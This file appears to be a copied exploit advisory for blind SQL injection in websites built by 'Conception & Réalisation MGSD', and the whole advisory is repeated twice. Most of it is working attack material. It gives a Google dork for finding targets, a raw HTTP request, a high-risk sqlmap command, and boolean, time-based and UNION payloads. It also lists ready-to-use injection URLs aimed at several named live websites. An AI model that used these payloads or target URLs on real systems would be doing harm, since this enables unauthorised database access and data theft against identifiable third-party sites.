JayChousfan/2023090062.txt

## 2023090062.txt
*********************************************************
#Exploit Title: Conception & Réalisation MGSD - Blind Sql Injection Vulnerability
#Date: 2023-09-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Conception & Réalisation MGSD"
#Category:webapps
#Tested On: Mac, Firefox
[+] search Dork : "Conception & Réalisation MGSD" google hack

![image-20240416004338784](https://gist.github.com/assets/87851908/873d9e97-f422-4642-aef0-3c3bf42cca0b)

Example 1：
<<1.txt

GET /under_products_marechal.php?id= HTTP/1.1
Host: www.lakelec.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

sqlmap -r 1.txt -p "id" --batch --level 3 --risk 3 --random-agent

Payload：
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-5908' OR 5413=5413-- CZqv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 2816 FROM (SELECT(SLEEP(5)))PMke)-- TztO
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL-- -

![QQ图片20240416012201](https://gist.github.com/assets/87851908/ac40523d-6be1-4e94-a1d4-42484f8dd281)


Example 2：
https://www.cmcelqods-dz.com/notre-expertise-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL--%20-
https://www.cmcelqods-dz.com/injectables-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL,NULL--%20-
https://www.cmcelqods-dz.com/nos-praticiens-detail.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,substring(@@version,1,1)=1,NULL,NULL--%20-
https://www.tiziriceramica.com/en/actualites-detail.php?id=2%27%20and%20substring(@@version,1,1)=5--+&titre=Salon%20international%20des%20promoteurs%20immobiliers%20et%20maisons%20intelligentes%20E-LOGIA%20Oran

  reference: https://cxsecurity.com/issue/WLB-2023090062
	*********************************************************
	#Exploit Title: Conception & Réalisation MGSD - Blind Sql Injection Vulnerability
	#Date: 2023-09-11
	#Exploit Author: Behrouz Mansoori
	#Google Dork: "Conception & Réalisation MGSD"
	#Category:webapps
	#Tested On: Mac, Firefox
	[+] search Dork : "Conception & Réalisation MGSD" google hack

	![image-20240416004338784](https://gist.github.com/assets/87851908/873d9e97-f422-4642-aef0-3c3bf42cca0b)

	Example 1：
	<<1.txt

	GET /under_products_marechal.php?id= HTTP/1.1
	Host: www.lakelec.com
	Pragma: no-cache
	Cache-Control: no-cache
	Upgrade-Insecure-Requests: 1
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
	Accept-Encoding: gzip, deflate
	Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
	Connection: close

	sqlmap -r 1.txt -p "id" --batch --level 3 --risk 3 --random-agent

	Payload：
	---
	Parameter: id (GET)
	Type: boolean-based blind
	Title: OR boolean-based blind - WHERE or HAVING clause
	Payload: id=-5908' OR 5413=5413-- CZqv
	Type: time-based blind
	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
	Payload: id=' AND (SELECT 2816 FROM (SELECT(SLEEP(5)))PMke)-- TztO
	Type: UNION query
	Title: Generic UNION query (NULL) - 5 columns
	Payload: id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL-- -

	![QQ图片20240416012201](https://gist.github.com/assets/87851908/ac40523d-6be1-4e94-a1d4-42484f8dd281)


	Example 2：
	https://www.cmcelqods-dz.com/notre-expertise-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL--%20-
	https://www.cmcelqods-dz.com/injectables-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL,NULL--%20-
	https://www.cmcelqods-dz.com/nos-praticiens-detail.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,substring(@@version,1,1)=1,NULL,NULL--%20-
	https://www.tiziriceramica.com/en/actualites-detail.php?id=2%27%20and%20substring(@@version,1,1)=5--+&titre=Salon%20international%20des%20promoteurs%20immobiliers%20et%20maisons%20intelligentes%20E-LOGIA%20Oran

	reference: https://cxsecurity.com/issue/WLB-2023090062